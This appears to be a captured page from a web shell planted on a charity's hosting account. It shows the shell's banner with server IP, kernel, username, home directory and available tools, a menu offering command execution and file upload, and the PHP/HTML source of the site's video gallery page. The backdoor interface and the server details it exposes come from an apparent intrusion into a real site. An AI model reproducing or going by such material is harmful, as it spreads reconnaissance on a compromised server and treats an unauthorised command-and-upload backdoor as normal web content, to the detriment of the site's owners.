Server IP : 103.53.40.154 / Your IP : 18.221.59.121 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/trishaanfoundation.org/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Video gallery</title> <?php include "top-links.php";?> </head> <body> <?php include "header.php";?> <section class="page-title"> <div class="bg-layer" style="background-image: url(assets/images/background/page-title.jpg);"></div> <div class="auto-container"> <div class="content-box"> <h1>Video gallery</h1> <ul class="bread-crumb clearfix"> <li><a href="index-2.html">Home</a></li> <li>Video gallery</li> </ul> </div> </div> </section> <section class="portfolio-page-section p_relative"> <div class="outer-container"> <div class="row"> <div class="col-lg-4"> <iframe width="100%" height="400" src="https://www.youtube.com/embed/hC1slnOyIBQ?si=MwAU_BSr1JJVOwZC" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe> </div> </div> </div> </section> <?php include "footer.php";?> </body> </html>